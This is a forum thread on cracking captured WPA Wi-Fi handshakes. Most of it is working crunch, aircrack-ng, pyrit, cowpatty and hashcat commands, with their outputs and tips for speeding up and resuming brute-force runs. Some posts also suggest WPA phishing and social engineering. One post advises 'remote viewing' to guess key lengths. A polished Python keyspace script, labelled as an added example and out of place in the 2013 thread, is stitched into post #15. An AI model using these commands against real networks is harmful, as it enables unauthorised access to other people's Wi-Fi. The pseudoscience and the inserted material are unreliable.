Results 1 to 50 of 62

Thread: Cracking WPA key with crunch | aircrack (almost foolproof, but how to speed things up)

  1. #1

    Question Cracking WPA key with crunch | aircrack (almost foolproof, but how to speed things up)

    Hello guys, I'm not going to discuss handshakes since I guess you are all familiar with airmon, airodump and aireplay and know how to get them.
    That's about the first step in cracking WPA and the easy job. The hard job is to actually crack the WPA key from the cap file.
    I was looking for a method that is foolproof without actually storing a huge wordlist on your desktop (talking about lots and lots of terabytes),
    so I came up with the following:

    # crunch 0 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX YZ0123456789 | aircrack-ng --bssid aa:aa:aa:aa:aa:aa -w- handshakefile.cap

    (notice there is a space in the command that shouldn't be there; I guess the forum can't handle a 62-character word)

    meaning that crunch is making a list with minimum 0 and maximum 25 characters, with alphanumeric lowercase and uppercase characters, that is not stored in a wordlist file.
    The "|" ends the crunch command and then we go to the aircrack command:
    with the BSSID of the "victim" (notice you have to be authorised by the victim to do the test) and -w-, which specifies the handshake.cap file.


    It took me about 30 minutes to crack the following WPA password: hickmin123 (which is an easy password because there are no caps in the password).
    However I believe it's an almost foolproof method and with lots of time you are able to crack long passwords.
    Now the real question...

    Does anyone have an idea how to edit my command to speed up the cracking process with a precalculating tool? Because that would be the coolest thing :-)
    Please notice I only like to use programs preinstalled in Kali Linux.
    Last edited by leevai; 2013-08-10 at 08:18. Reason: fault in my Kali command that needs an edit

  2. #2
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    Quote Originally Posted by leevai View Post
    Hello guys, I'm not going to discuss handshakes since I guess you are all familiar with airmon, airodump and aireplay and know how to get them.
    That's about the first step in cracking WPA and the easy job. The hard job is to actually crack the WPA key from the cap file.
    I was looking for a method that is foolproof without actually storing a huge wordlist on your desktop (talking about lots and lots of terabytes),
    so I came up with the following:

    # crunch 0 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX YZ0123456789 | aircrack-ng --bssid aa:aa:aa:aa:aa:aa -w- handshakefile.cap

    (notice there is a space in the command that shouldn't be there; I guess the forum can't handle a 62-character word)

    meaning that crunch is making a list with minimum 0 and maximum 25 characters, with alphanumeric lowercase and uppercase characters, that is not stored in a wordlist file.
    The "|" ends the crunch command and then we go to the aircrack command:
    with the BSSID of the "victim" (notice you have to be authorised by the victim to do the test) and -w-, which specifies the handshake.cap file.


    It took me about 30 minutes to crack the following WPA password: hickmin123 (which is an easy password because there are no caps in the password).
    However I believe it's an almost foolproof method and with lots of time you are able to crack long passwords.
    Now the real question...

    Does anyone have an idea how to edit my command to speed up the cracking process with a precalculating tool? Because that would be the coolest thing :-)
    Please notice I only like to use programs preinstalled in Kali Linux.
    Hi,
    I'm not an expert, but the GPU-cracking process is much faster!!
    My old, simple example with CUDA:
    https://vimeo.com/62995190

  3. #3
    Hi,
    I'm not an expert, but the GPU-cracking process is much faster!!
    My old, simple example with CUDA:
    https://vimeo.com/62995190


    Isn't that a method with existing wordlists? I'm looking for a fast method to crack a 12-digit unknown password with a combination of lowercase, caps and numbers, i.e. passwords with random combinations that are not in a dictionary.
    I tried to watch the vid, but unfortunately the quality of the vid is pretty low and I can't read much of the screens.. sorry

  4. #4
    crunch 0 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 | pyrit -r xxx.cap -b xx:xx:xx:xx:xx:xx -i - attack_passthrough

  5. #5
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    Quote Originally Posted by hausoo View Post
    crunch 0 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 | pyrit -r xxx.cap -b xx:xx:xx:xx:xx:xx -i - attack_passthrough
    Thanks, +1 for helping me to explain..... I have an extraterrestrial language
    @leevai sorry for the video quality (but it's partially a web-hosting problem).. the FONT-VIDEO I have uploaded is good quality!... however, if you HAVE ""cuda-enable"" read the response of hausoo's friend.. it contains the same question as my video
    bye
    Last edited by zimmaro; 2013-08-10 at 15:48.

  6. #6
    thanks a lot zimmaro!!

    Quote Originally Posted by zimmaro View Post
    Thanks, +1 for helping me to explain..... I have an extraterrestrial language
    @leevai sorry for the video quality (but it's partially a web-hosting problem).. the FONT-VIDEO I have uploaded is good quality!... however, if you ""cuda-enable"" read the response of hausoo's friend
    bye

  7. #7
    Hi hausoo,
    thanks a lot for the reply! I did a first check and it seems to work fine. Tomorrow I will be doing a test on my home PC as it is a much faster computer.

    Quote Originally Posted by hausoo View Post
    crunch 0 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 | pyrit -r xxx.cap -b xx:xx:xx:xx:xx:xx -i - attack_passthrough

  8. #8
    Is it possible this speeds things up by about 25%? Greetz

  9. #9
    Yes, it depends on your video card (CUDA cores).

    Crack a 12-digit unknown password:

    crunch 12 12 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 | pyrit -r xxx.cap -b xx:xx:xx:xx:xx:xx -i - attack_passthrough

    crunch + aircrack-ng, CPU only

    Code:
    ~# crunch 12 12 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 | aircrack-ng -w - -b xx:xx:xx:xx:xx:xx capture-03.cap
    Crunch will now generate the following amount of data: 12018631630886850560 bytes
    11461860304724 MB
    11193222953 GB
    10930881 TB
    10674 PB
    Crunch will now generate the following number of lines: 16533293572437839872 
    Opening capture-03.cap
    Reading packets, please wait...
    
    
    
                                     Aircrack-ng 1.2 beta1
    
    
                       [00:00:45] 180855 keys tested (4367.42 k/s)
    crunch + pyrit, CPU + GPU (CUDA, 334 cores)
    Code:
    ~# crunch 12 12 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 | pyrit -r capture-03.cap -b xx:xx:xx:xx:xx:xx -i - attack_passthrough
    Crunch will now generate the following amount of data: 12018631630886850560 bytes
    11461860304724 MB
    11193222953 GB
    10930881 TB
    10674 PB
    Crunch will now generate the following number of lines: 16533293572437839872 
    Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
    This code is distributed under the GNU General Public License v3+
    
    Parsing file 'capture-03.cap' (1/1)...
    Parsed 47 packets (47 802.11-packets), got 1 AP(s)
    
    ^CCrunch ending at aaaaaaaajKUl0 23400 PMKs per second.

  10. #10
    Quote Originally Posted by leevai View Post
    Code:
    crunch 0 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 | aircrack-ng --bssid aa:aa:aa:aa:aa:aa -w- handshakefile.cap
    (notice there is a space in the command that shouldn't be there; I guess the forum can't handle a 62-character word)
    This is a great post. Thanks. Especially pointing out the little vB code issue, most people overlook these small details. You could use CODE syntax to fix it.

  11. #11
    Quote Originally Posted by zimmaro View Post
    hi
    i'm not expert but the process of GPU-cracking is more fast!!
    my old-simple example with cuda
    https://vimeo.com/62995190
    Agreed. GPU cracking is faster.

  12. #12
    Join Date
    2013-Aug
    Posts
    1
    Quote Originally Posted by leevai View Post
    Hello guys, I'm not going to discuss handshakes since I guess you are all familiar with airmon, airodump and aireplay and know how to get them.
    That's about the first step in cracking WPA and the easy job. The hard job is to actually crack the WPA key from the cap file.
    I was looking for a method that is foolproof without actually storing a huge wordlist on your desktop (talking about lots and lots of terabytes),
    so I came up with the following:

    # crunch 0 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX YZ0123456789 | aircrack-ng --bssid aa:aa:aa:aa:aa:aa -w- handshakefile.cap

    (notice there is a space in the command that shouldn't be there; I guess the forum can't handle a 62-character word)

    meaning that crunch is making a list with minimum 0 and maximum 25 characters, with alphanumeric lowercase and uppercase characters, that is not stored in a wordlist file.
    The "|" ends the crunch command and then we go to the aircrack command:
    with the BSSID of the "victim" (notice you have to be authorised by the victim to do the test) and -w-, which specifies the handshake.cap file.


    It took me about 30 minutes to crack the following WPA password: hickmin123 (which is an easy password because there are no caps in the password).
    However I believe it's an almost foolproof method and with lots of time you are able to crack long passwords.
    Now the real question...

    Does anyone have an idea how to edit my command to speed up the cracking process with a precalculating tool? Because that would be the coolest thing :-)
    Please notice I only like to use programs preinstalled in Kali Linux.
    Hi,

    I tried many times to crack WPA with crunch, but when I give the command which you mentioned above it takes too long reading packets. I mean, when the amount of data generated is in terabytes, crunch hangs in reading packets for a long, long time. Can you please guide me on how to crack my simple password "wifi5214" within 30 minutes.

  13. #13
    Do not add the capital letters. That's going to be much faster in your case.

  14. #14
    Join Date
    2013-Aug
    Posts
    9
    Quote Originally Posted by leevai View Post
    Hi,
    I'm not an expert, but the GPU-cracking process is much faster!!
    My old, simple example with CUDA:
    https://vimeo.com/62995190


    Isn't that a method with existing wordlists? I'm looking for a fast method to crack a 12-digit unknown password with a combination of lowercase, caps and numbers, i.e. passwords with random combinations that are not in a dictionary.
    I tried to watch the vid, but unfortunately the quality of the vid is pretty low and I can't read much of the screens.. sorry
    Have a look at "hashcat". Hashcat uses the GPU to crack WPA. You can use it either with a wordlist or to brute-force the combination of any type of digits.

  15. #15
    30 min = supercomputer / GPU cluster / GPU farm

    One GPU example:
    Time.Started...: Sat Aug 24 21:32:28 2013 (32 secs)
    Time.Estimated.: Fri Apr 9 09:48:35 2021 (7 years, 227 days)

    Code:
    ./cudaHashcat-plus.bin -a 3 -m 2500 dd.hccap
    cudaHashcat-plus v0.14 by atom starting...
    
    Hashes: 1 total, 1 unique salts, 1 unique digests
    Bitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes
    Workload: 16 loops, 8 accel
    Watchdog: Temperature abort trigger set to 70c
    Watchdog: Temperature retain trigger set to 60c
    Device #1: GeForce GTX 560, 1023MB, 1620Mhz, 7MCU
    Device #1: Kernel ./kernels/4318/m2500.sm_21.64.ptx
    
    [s]tatus [p]ause [r]esume [b]ypass [q]uit => s
    Session.Name...: cudaHashcat-plus
    Status.........: Running
    Input.Mode.....: Mask (?1?2?2?2?2?2?2?3)
    Hash.Target....: xxx (00:1d:7e:xx:xx:xx <-> 00:23:69:xx:xx:xx)
    Hash.Type......: WPA/WPA2
    Time.Started...: Sat Aug 24 21:32:28 2013 (32 secs)
    Time.Estimated.: Fri Apr  9 09:48:35 2021 (7 years, 227 days)
    Speed.GPU.#1...:    24637/s
    Recovered......: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
    Progress.......: 774144/5533380698112 (0.00%)
    Rejected.......: 0/774144 (0.00%)
    HWMon.GPU.#1...: -1% Util, 52c Temp, 55% Fan
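    As an added worked example (not code from any poster in this thread), the script below reproduces the numbers quoted in posts #9, #15 and #20 so the run-time claims can be checked before a machine is committed to them: the candidate count and streamed byte count for a crunch charset/length range, the keyspace of a hashcat -a 3 mask, and the exhaustive run time at a given PMK/s rate. It also shows something the posts do not say: the totals crunch printed in post #9 (16533293572437839872 lines, 12018631630886850560 bytes) are exactly 62^12 and 13·62^12 reduced modulo 2^64, i.e. crunch's 64-bit counter wrapped, and the real keyspace for 12 mixed-case alphanumerics is 62^12 ≈ 3.2·10^21, about 195 times what was displayed. The 36^10 figures in post #20 fit in 64 bits and are exact. Assumptions, labelled in the comments: crunch emits one candidate per line plus a newline, and the ?1/?2/?3 class sizes are hashcat's defaults when no custom charset is given (the mask in post #15 relies on them).

```python
# Added example (not from any poster in this thread): keyspace and run-time
# estimator for the crunch and hashcat brute-force runs quoted above.
# Assumptions: crunch writes each candidate followed by '\n' and keeps its
# printed totals in a 64-bit counter; hashcat class sizes are listed below.

TWO64 = 1 << 64  # crunch's printed totals wrap at this value (post #9)

# hashcat mask character classes. ?1..?3 are the defaults hashcat applies when
# no custom charset (-1/-2/-3) is supplied; the mask in post #15 relies on them.
HASHCAT_CLASSES = {
    "?l": 26,  # a-z
    "?u": 26,  # A-Z
    "?d": 10,  # 0-9
    "?s": 33,  # printable specials
    "?a": 95,  # all printable ASCII
    "?1": 62,  # default ?1 = ?l?d?u
    "?2": 36,  # default ?2 = ?l?d
    "?3": 41,  # default ?3 = ?l?d*!$@_
}

SECONDS_PER_YEAR = 365.25 * 86400


def crunch_keyspace(charset_size, min_len, max_len):
    """Candidates and bytes crunch would stream for lengths min_len..max_len."""
    if charset_size < 1 or min_len < 1 or max_len < min_len:
        raise ValueError("need charset_size >= 1 and 1 <= min_len <= max_len")
    lengths = range(min_len, max_len + 1)
    lines = sum(charset_size ** n for n in lengths)
    nbytes = sum(charset_size ** n * (n + 1) for n in lengths)  # +1 for '\n'
    return lines, nbytes


def as_crunch_prints(value):
    """What crunch displays for a total: the value reduced modulo 2^64."""
    return value % TWO64


def hashcat_mask_keyspace(mask):
    """Keyspace of a hashcat -a 3 mask such as '?1?2?2?2?2?2?2?3'."""
    total, i = 1, 0
    while i < len(mask):
        if mask[i] == "?":
            token = mask[i:i + 2]
            if token != "??":                    # '??' is an escaped literal '?'
                total *= HASHCAT_CLASSES[token]  # KeyError on an unknown class
            i += 2
        else:                                    # literal character: one choice
            i += 1
    return total


def seconds_to_exhaust(candidates, rate_per_second):
    """Worst-case time to try every candidate at a steady rate."""
    return candidates / rate_per_second


def human_duration(seconds):
    years, rem = divmod(seconds, SECONDS_PER_YEAR)
    return f"{int(years)} years {int(rem // 86400)} days"


if __name__ == "__main__":
    # Post #9: crunch 12 12 <62 chars>; the printed totals are the wrapped values.
    lines, nbytes = crunch_keyspace(62, 12, 12)
    print(f"62^12 real lines: {lines}  crunch shows: {as_crunch_prints(lines)}")
    print(f"real bytes: {nbytes}  crunch shows: {as_crunch_prints(nbytes)}")
    print("at 23400 PMK/s:", human_duration(seconds_to_exhaust(lines, 23400)))
    # Post #15: hashcat mask at the displayed GPU rate.
    ks = hashcat_mask_keyspace("?1?2?2?2?2?2?2?3")
    print(f"mask keyspace {ks}, at 24637/s:",
          human_duration(seconds_to_exhaust(ks, 24637)))
    # Post #20: 36^10 fits in 64 bits, so crunch's totals are exact there.
    print("36^10 lines, bytes:", crunch_keyspace(36, 10, 10))
```

    At the 24,637 PMK/s shown in post #15 the ?1?2?2?2?2?2?2?3 mask (5,533,380,698,112 candidates) takes about 7.1 years to exhaust, in line with the tool's own estimate; the full 62^12 space at the 23,400 PMK/s of post #9 is measured in billions of years. Run the numbers against your own passphrase policy before trusting any "30 minutes" figure.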

  16. #16
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by leevai View Post
    Hello guys, I'm not going to discuss handshakes since I guess you are all familiar with airmon, airodump and aireplay and know how to get them.
    That's about the first step in cracking WPA and the easy job. The hard job is to actually crack the WPA key from the cap file.
    I was looking for a method that is foolproof without actually storing a huge wordlist on your desktop (talking about lots and lots of terabytes),
    so I came up with the following:

    # crunch 0 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX YZ0123456789 | aircrack-ng --bssid aa:aa:aa:aa:aa:aa -w- handshakefile.cap

    (notice there is a space in the command that shouldn't be there; I guess the forum can't handle a 62-character word)

    meaning that crunch is making a list with minimum 0 and maximum 25 characters, with alphanumeric lowercase and uppercase characters, that is not stored in a wordlist file.
    The "|" ends the crunch command and then we go to the aircrack command:
    with the BSSID of the "victim" (notice you have to be authorised by the victim to do the test) and -w-, which specifies the handshake.cap file.


    It took me about 30 minutes to crack the following WPA password: hickmin123 (which is an easy password because there are no caps in the password).
    However I believe it's an almost foolproof method and with lots of time you are able to crack long passwords.
    Now the real question...

    Does anyone have an idea how to edit my command to speed up the cracking process with a precalculating tool? Because that would be the coolest thing :-)
    Please notice I only like to use programs preinstalled in Kali Linux.
    Yeah, I don't know if anyone pointed this out, but it wouldn't make sense to run

    Code:
    crunch 0 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 | aircrack-ng --bssid aa:aa:aa:aa:aa:aa -w- handshakefile.cap
    Instead, run

    Code:
    crunch 8 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 | aircrack-ng --bssid aa:aa:aa:aa:aa:aa -w- handshakefile.cap
    (I just changed the number of characters because a WPA key has to be at least 8 characters... should save a good amount of time.)

  17. #17
    Join Date
    2014-Jan
    Posts
    1
    Can anyone please help me??? I don't know how to get the .cap file. I know how to do everything else, except get the handshake file. Please help!!

  18. #18
    Quote Originally Posted by Greevaz View Post
    Can anyone please help me??? I don't know how to get the .cap file. I know how to do everything else, except get the handshake file. Please help!!
    There is a plethora of information, not only on this forum but throughout the web, on how to do this.

    I would suggest starting at http://www.aircrack-ng.org/doku.php?id=cracking_wpa and then using whatever method you feel comfortable with to crack the .cap (there are also online services for this, but to date I have not had any success with them).

    If still having difficulties, use Google. (Google can be your best friend)

    Rab.

  19. #19
    Join Date
    2013-Jul
    Posts
    844
    There are several issues in this blog that are not covered.

    1. We highly suggest you avoid using aircrack-ng when trying to decrypt a WPA password. Aircrack-ng may tell you that it sees a password in your cap file BUT will be unable to crack it. Dig through the aircrack-ng forums and you will find this issue covered. You cannot trust this program to find the password, so you might throw a lot of time at the problem for nothing.

    2. What is also not covered is the length of time it takes to brute force a character set like abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789. Even with our high-speed 64-bit computers running two ATI graphics cards at really high speed, 100,000-150,000, this would take years.

    3. Lastly is saving your work in stages. You cannot expect to run a computer for months without refreshing it. If you refer to the thread below you will find a method of saving a crunch passthrough. However we are unsure it will work with dictionaries as we use different tools.

    https://forums.kali.org/showthread.p...st-or-make-one

    If you want to crack WPA, try a letter frequency approach. Furthermore you need to be able to easily save your work in stages. The tool of choice is Elcomsoft / Windows 7 64-bit / high-speed graphics cards. Use dictionaries wherever possible to save the computer from having to waste time computing in a passthrough.

    We run the following sequence:
    length 8 8 numeric: dictionary files broken into 200,000 chunks
    length 9 9 numeric: same as 8
    length 10 10 numeric: same as 8
    Common password dictionaries
    WPA word lists available through torrent


    MTA/MTB

  20. #20
    Join Date
    2014-Jan
    Posts
    6
    I've been following this thread and experimenting with crunch and pyrit. I am trying to crack a handshake with a 10 length password of mixed lower case and numbers.

    Code:
    crunch 10 10 abcdefghijklmnopqrstuvwxyz0123456789 | pyrit -r test-01.cap -b 00:00:00:00:00:00 -i - attack_passthrough
    This is the output I am getting; why is it testing phrases over 10 characters long? I am assuming that when the program is cancelled the output is being overwritten by the PMKs per second? So I can ignore the last two numbers "55". Can crunch/pyrit be trusted to actually find the correct handshake passphrase?

    Code:
    Crunch will now generate the following amount of data: 40217742840692736 bytes
    38354628411 MB
    37455691 GB
    36577 TB
    35 PB
    Crunch will now generate the following number of lines: 3656158440062976 
    Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
    This code is distributed under the GNU General Public License v3+
    
    Parsing file 'test-01.cap' (1/1)...
    Parsed 31 packets (31 802.11-packets), got 1 AP(s)
    
    ^CCrunch ending at aaaaq6h76555 PMKs per second.
    I am planning on resuming the session by looking at the last passphrase tested and starting again, for example starting from bbbbbbbbbb:

    Code:
    crunch 10 10 abcdefghijklmnopqrstuvwxyz0123456789 -s bbbbbbbbbb | pyrit -r test-01.cap -b 00:00:00:00:00:00 -i - attack_passthrough

  21. #21
    Join Date
    2013-Jul
    Posts
    844
    Study the forum link we gave above. Again, we do not use this approach as it is too slow; however, we think the command string you would want to use is:

    crunch <MinPasswordLength> <MaxPasswordLength> <CharacterSetToBeUsed> -s <StartPoint> -d 4 | pyrit -e <APessid> -i - -o - passthrough | cowpatty -d - -r <Handshake.cap> -s <APessid>

    This avoids the aircrack-ng bug and gives you the ability to stop and start the program, and ??WE THINK?? you can get CUDA and high-speed graphics cards working.



    IF you are referencing:

    CCrunch ending at aaaaq6h76555 PMKs per second

    as your "crunch over 10 in length" comment above, this is the intermediate PMK, not the primary number set you chose, which is 10 in length composed of all lowercase letters and numbers. Study what a PMK is. This will lead you into rainbow tables. Before you jump into precomputing PMKs or rainbow tables, note the precomputed PMK only works against a specific salt, which is the --essid name of the AP. If they change the ESSID name all your work becomes worthless, SO rainbow tables are normally only computed against common names for APs.

  22. #22
    Join Date
    2013-Apr
    Location
    LocalHost
    Posts
    4
    The best & fastest thing to use is hashcat... using it will give you less of a headache.

  23. #23
    Join Date
    2014-Jan
    Location
    Italy (Prato)
    Posts
    5
    Quote Originally Posted by leevai View Post
    Hello guys, I'm not going to discuss handshakes since I guess you are all familiar with airmon, airodump and aireplay and know how to get them.
    That's about the first step in cracking WPA and the easy job. The hard job is to actually crack the WPA key from the cap file.
    I was looking for a method that is foolproof without actually storing a huge wordlist on your desktop (talking about lots and lots of terabytes),
    so I came up with the following:

    # crunch 0 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX YZ0123456789 | aircrack-ng --bssid aa:aa:aa:aa:aa:aa -w- handshakefile.cap

    (notice there is a space in the command that shouldn't be there; I guess the forum can't handle a 62-character word)

    meaning that crunch is making a list with minimum 0 and maximum 25 characters, with alphanumeric lowercase and uppercase characters, that is not stored in a wordlist file.
    The "|" ends the crunch command and then we go to the aircrack command:
    with the BSSID of the "victim" (notice you have to be authorised by the victim to do the test) and -w-, which specifies the handshake.cap file.


    It took me about 30 minutes to crack the following WPA password: hickmin123 (which is an easy password because there are no caps in the password).
    However I believe it's an almost foolproof method and with lots of time you are able to crack long passwords.
    Now the real question...

    Does anyone have an idea how to edit my command to speed up the cracking process with a precalculating tool? Because that would be the coolest thing :-)
    Please notice I only like to use programs preinstalled in Kali Linux.
    And how is that possible?

    For this bruteforce calculator:



    (Website: http://calc.opensecurityresearch.com/)

    If I have 43,000 PMKs per second with the CUDA of a GTX 580, I find the password after many years XD

    How is it possible that you found your password "hickmin123" with mixalpha-numeric in 30 MINUTES? o_O

  24. #24
    Join Date
    2014-Feb
    Posts
    8
    When I start:
    crunch 8 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 | aircrack-ng --bssid aa:aa:aa:aa:aa:aa -w- handshakefile.cap
    I get this:
    (00:00:31) 14108 keys tested (508.08 k/s)
    Is this a good speed (508.08 k/s)?
    I have: Processor: AMD Athlon(tm) 64 X2 Dual Core Processor 4800+ × 2
    and wifi antenna TP-Link TL-WN722N with 150 Mbps
    Please help
    Last edited by Alexcreator; 2014-02-23 at 08:05.

  25. #25
    Quote Originally Posted by Alexcreator View Post
    When I start:
    crunch 8 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 | aircrack-ng --bssid aa:aa:aa:aa:aa:aa -w- handshakefile.cap
    I get this:
    (00:00:31) 14108 keys tested (508.08 k/s)
    Is this a good speed (508.08 k/s)?
    I have: Processor: AMD Athlon(tm) 64 X2 Dual Core Processor 4800+ × 2
    and wifi antenna TP-Link TL-WN722N with 150 Mbps
    Please help
    Well, I wouldn't complain... I can only get 5000 on my crappy machine

    Rab.

    Sorry, I misread your post - it appears that it is the same rate as mine, and that is poor by today's standards
    Last edited by flyinghaggis; 2014-02-23 at 10:53. Reason: Didn't read post properly

  26. #26
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    Quote Originally Posted by Alexcreator View Post
    When I start:
    crunch 8 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 | aircrack-ng --bssid aa:aa:aa:aa:aa:aa -w- handshakefile.cap
    I get this:
    (00:00:31) 14108 keys tested (508.08 k/s)
    Is this a good speed (508.08 k/s)?
    I have: Processor: AMD Athlon(tm) 64 X2 Dual Core Processor 4800+ × 2
    and wifi antenna TP-Link TL-WN722N with 150 Mbps
    Please help
    Hi:
    I think
    .... it's a good speed for YOUR hardware / NO-GPU METHOD
    ONLY as an example (not to prove anything), on my virtualized hardware with NO GPU (because it is virtualized) I have this:
    http://www.imagestime.com/show.php/924265_1.PNG.html

    @click_ONTO_zoOM

  27. #27
    Join Date
    2014-Jan
    Location
    Italy (Prato)
    Posts
    5
    Quote Originally Posted by zimmaro View Post
    Hi:
    I think
    .... it's a good speed for YOUR hardware / NO-GPU METHOD
    ONLY as an example (not to prove anything), on my virtualized hardware with NO GPU (because it is virtualized) I have this:
    http://www.imagestime.com/show.php/924265_1.PNG.html

    @click_ONTO_zoOM
    And also with CUDA this attack is useless.

    Look at my screen: also with a password length of 8 this attack is impossible.

  28. #28
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    Quote Originally Posted by Pikachu95 View Post
    And also with CUDA this attack is useless.

    Look at my screen: also with a password length of 8 this attack is impossible.
    Hi
    If this is your thinking, I respect that!!! But by logic / probability / time / fortune ... it is not totally impossible!
    && CUDA (for me) I think can give you a REALLY GREAT hand in speeding up the process!

  29. #29
    Join Date
    2014-Jan
    Location
    Italy (Prato)
    Posts
    5
    Quote Originally Posted by zimmaro View Post
    Hi
    If this is your thinking, I respect that!!! But by logic / probability / time / fortune ... it is not totally impossible!
    && CUDA (for me) I think can give you a REALLY GREAT hand in speeding up the process!
    What I wrote is true; it's not my opinion.

    Use this calculator: http://calc.opensecurityresearch.com/ with charset lalpha-numeric.

    The brute force finishes after 1 year!

    So, for example, if I put a WPA2 key like: Zympo123, you must wait 1 year to crack this password at 83,000 PMKs.



    And length 8 is the min.; try with length 9 or 10 in that calculator.

    Or try also with 8, but with MIXALPHA-NUMERIC.



    So? What's the solution?

  30. #30
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    impossible ~= 1 year 39 days ........ etc.
    impossible ~= 84 years 265 days ..... etc.

    * ~= in MATLAB means "different"

  31. #31
    Join Date
    2013-Jul
    Posts
    844
    The author of this thread was over-optimistic when factoring the time required.

    You can try a letter frequency approach. The most frequent are etaoin

    etaoin shrdlu cmfwyp vbgkjq xz

    Run in this order:

    etaoin0123456789
    etaoinshrdlu0123456789
    etaoinshrdlucmfwyp0123456789

    You should get the idea.

    Do not waste time with lengths over 10, so just do 8-10.

    Back when reaver was king we cracked around 100 wifi receivers using reaver and ran a statistical analysis of key types and lengths chosen by users.

    Over half were numeric, less than 11
    Very few were greater than 10 in length
    Over half of the numeric ones were phone numbers
    Only 5% were greater than 10 in length.

    We have this paper around somewhere; maybe we will republish, as it was lost when aircrack-ng went down.

    The best way to brute force a key is to try and determine the length and key types used. You can then focus your brute force in that area.

    You could guess or:

    For those that want a more esoteric and focused guess, try remote viewing. The Quality Assurance Division of ASN does not want you to develop these skills. Google Ed Dames for techniques.

    You do not remote view the key; you remote view the length of the key and the key constituents (type of characters), then turn to your computer to do the brute force. You also need two (2) people to conduct the remote viewing session.

    If you find the key longer than 11 and are using one computer, do not bother. You might get lucky with a dictionary.

    If you really need the key, try the WPA phishing programs; turn to social engineering using pwnstar. See the aircrack-ng forums, I think under programs.

    Musket Team A/C

  32. #32
    Quote Originally Posted by mmusket33 View Post

    You can try a letter frequency approach. The most frequent are etaoin

    etaoin shrdlu cmfwyp vbgkjq xz

    Run in this order

    etaoin0123456789
    etaoinshrdlu0123456789
    etaoinshrdlucmfwyp0123456789

    You should get the idea.

    Musket Team A/C
    How would I run this in Elcomsoft Wireless Auditor? I have had difficulty setting this programme up
    with a brute force running a custom char set.

    Rab.

  33. #33
    Quote Originally Posted by mmusket33 View Post
    Dear Rab,
    There is an attack called the mask attack. You will need a version of Elcomsoft, probably v5.0.252 or v5.1.271, that supports this. If you want to do a letter frequency approach there is a page that allows you to enter the characters you want. Study the help files.

    MTC
    Sorry, yes it is the mask attack I was referring to.

    From the help file, which I missed the first time of reading, I am guessing that

    in the Mask Attack options under Custom Charset I would enter something like zwerfalj, and in the mask field
    I would enter ?1?1?1?1?1?1?1?1. Could you confirm please?

    If you could also point me to a Windows proggy that can precompute a dictionary attack other than oclHashcat: I have
    used L517 v0.8 in the past (although good, it is not user friendly and only allows output up to 2 GB if memory serves me right),
    but I would like to compute the dictionary based on a starting point of one character, for instance (r), which could be eliminated,
    and the rest to be random up to 8. That would reduce the size of the file and would be more like a lucky dip (hit or miss); then on failure
    I would be able to try another char (w) rather than going through the complete char set from a to z.

    I would just like to add my thanks for responding to this post - I have noticed from previous posts that
    you advocate the use of EWSA and I myself like it too.

    Rab.

    I have now worked out most of the above. It uses a similar format to oclHashcat, but I am still interested in a good password generator
    for Windows.
    Last edited by g0tmi1k; 2014-12-09 at 11:41.

  34. #34
    Join Date
    2013-Jul
    Posts
    844
    We found the best word generator turned out to be crunch. Google "Crunch A Day With Tape". You will need to write the output to file. When loading the dictionaries into Elcomsoft, the drop-down menu has a file types entry. Click on the arrow on the right side and change to "all files", or your files made with crunch will not be seen. If we remember correctly you can also set the file size with crunch. Keep these files small.
    The only thing left is administrative in nature. We make a local-area telephone-number-type, 8 to 9 numeric-length file; in Elcomsoft we input the dictionaries and just add handshakes to the file. We have a 10-length dictionary file, again adding handshakes, and then a large dictionary file. Anytime we get a handshake we stop any ongoing process and run it against the telephone 8/9 numeric first, as most of your hits will be telephone numbers - numeric 8, 9 and 10.

  35. #35

    **** Country: no law for breaking someone's private wifi.

    Hello, mmusket33

    I'm new BTW, I'm just starting to learn Kali Linux and just wondering if my new neighbor is sneaking onto my wifi (ever since they moved in my internet slowed down). I managed to get the .hccap and .cap file; can you tell me what my passphrase is? My router is a Linksys WRT54G.

    I'm just wondering if it is possible to crack in so little time - I'd say they moved into our area 3 days ago.

    Sorry for the inconvenience. Hoping for a reply soon. Thanks.

  36. #36
    Join Date
    2014-Mar
    Posts
    1
    So far I have noticed crunch just being a waste of time, for the simple fact that I know 70% of the word list is useless. No one in their right mind is going to use a password that it generates.

    example:
    aaaaaaaa01
    aaaaaaaa02
    aaaaaaaa03

  37. #37
    Quote Originally Posted by GlockSmok3 View Post
